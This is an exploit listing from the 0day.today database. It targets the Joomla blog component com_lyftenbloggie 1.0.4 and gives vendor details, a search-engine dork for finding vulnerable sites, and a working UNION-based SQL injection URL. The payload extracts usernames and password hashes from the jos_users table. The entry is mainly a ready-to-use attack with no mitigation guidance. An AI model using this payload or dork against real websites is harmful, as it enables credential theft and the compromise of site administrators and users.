[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection

Author
kaMtiEz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10039
Category
web applications
Date add
28-11-2009
Platform
unsorted
==========================================================================
Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability
==========================================================================

[ Software Information ]
 
[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+] Description : LyftenBloggie is a blog publishing component for Joomla 1.5. LyftenBloggie is both free and opensource.
[+] version : 1.0.4 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_lyftenbloggie" / "Powered by LyftenBloggie"
[+] LOCATION : INDONESIA - JOGJA
 
#############################################################################################
 
[ Vulnerable File ]
 
http://server/index.php?option=com_lyftenbloggie&author=[ValidID][INDONESIANCODER]
 
[ Exploit ]
 
http://server/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--
 
#############################################################################################


#  0day.today [2024-12-24]  #